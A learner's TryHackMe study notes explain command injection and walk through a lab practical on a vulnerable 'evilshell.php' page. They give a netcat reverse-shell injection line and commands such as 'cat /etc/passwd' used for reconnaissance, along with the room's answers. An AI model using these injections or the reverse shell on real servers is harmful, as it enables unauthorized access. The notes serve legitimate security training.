🌺
tryhackme notes
  • 🌺TryHackMe Profile Link
  • Learning Paths
    • 🌺CompTIA PenTest+
      • 🍡Intro to Offensive Security
      • 🍡Penetration Testing Tools
        • 🍡Nmap
          • 🍡Nmap Switches
          • 🍡Overview
          • 🍡TCP Connect Scans
          • 🍡SYN Scans
          • 🍡UDP Scans
          • 🍡NULL, FIN, Xmas Scans
          • 🍡Working with the NSE
          • 🍡Practical
        • 🍡Burp Suite
          • 🍡Introduction
          • 🍡Site Map and Issue Definitions
        • 🍡Metasploit
          • 🍡Introduction
          • 🍡Working with Modules
        • 🍡Nessus
          • 🍡Introduction
          • 🍡Scanning!
          • 🍡Scanning a Web Application!
        • 🍡Hydra
          • 🍡Introduction
          • 🍡Using Hydra
      • 🍡Application-based Vulnerabilites
        • 🍡OWASP Top 10
          • 🍡[Severity 1] Command Injection
          • 🍡[Severity 2] Broken Authentication
          • 🍡[Severity 3] Sensitive Data Exposure
          • 🍡[Severity 4] XML External Entity
          • 🍡[Severity 5] Broken Access Control
          • 🍡[Severity 6] Security Misconfiguration
        • 🍡Vulnversity
      • 🍡Local-host Vulnerabilities
      • 🍡Network-based Vulnerabilites
    • 🌺Web Fundamentals
      • 🌺Introduction to Web Hacking
        • 🍡Walking an Application
      • 🌺Pickle Rick
  • Modules
    • 🌺Linux Fundamentals
      • 🍡Linux Fundamentals Part 1
        • 🍡Searching for Files
      • 🍡Linux Fundamentals Part 3
        • 🍡Processes 101
    • 🌺Introduction to Penetration Testing
      • 🍡Pentesting Fundamentals
        • 🍡Penetration Testing Methodologies
          • 🍡Black Box, White Box, Grey Box Penetration Testing
      • 🍡Principals of Security
        • 🍡The CIA Triad
        • 🍡Principles of Privilege
        • 🍡Security Models Continued
        • 🍡Threat Modelling & Incident Response
    • 🌺Introduction to Cyber Security
    • 🌺Pre Security
    • 🌺John the Ripper
  • Rooms
    • 🍡Basic Pentesting
    • 🍡OhSINT
    • 🌸Sakura Room
    • 😼dogcat
Powered by GitBook
On this page
  1. Learning Paths
  2. CompTIA PenTest+
  3. Application-based Vulnerabilites
  4. OWASP Top 10

[Severity 1] Command Injection

Notes about Command Injection & the practical

PreviousOWASP Top 10Next[Severity 2] Broken Authentication

Last updated 1 year ago

Command Injection occurs when a server-sidecode (like PHP) in a web application makes a system call to the host machine. Its a web vulnerability that can allow an attacker to use system commands on the server.

;nc -e /bin/bash - a reverse shell that takes advantage of a target system's vulnerabilities to initiate a shell system and access the victim's system.

Blind Command Injection - occurs when the system command made to the server does not return the response to the user in the HTML document.

We can detect Active Command INjection by seeing responses from the system call.

Practical

We are first greeted with the vulnerable website, http://10.10.29.177/evilshell.php.

From here, we are able to use various commands to find files and who is on the system. To answer the first question, I used the command "ls" to list all the folders in the current directory.

The strange file I found in this case was "drpepper.txt" which when read, reads "I love Dr Pepper".

To find who the user is, I used the "whoami" command.

Using "cat /etc/passwd", we are able to analyze the output and see that the user's shell is set at "usr/sbin/nologin".

To find the Ubuntu version, I used the command, "lsb_release -a".

To find the MOTD, we can use the command, cat /etc/update-motd.d/00-header.

Dr pepper is the favorite beverage in the script.

🌺
🍡
🍡
🍡
http://10.10.29.177/evilshell.php
drpepper.txt
I love Dr Pepper
whoami
/usr/sbin/nologin
Ubuntu 18.04.4
The output of cat /etc/update-motd.d/00-header/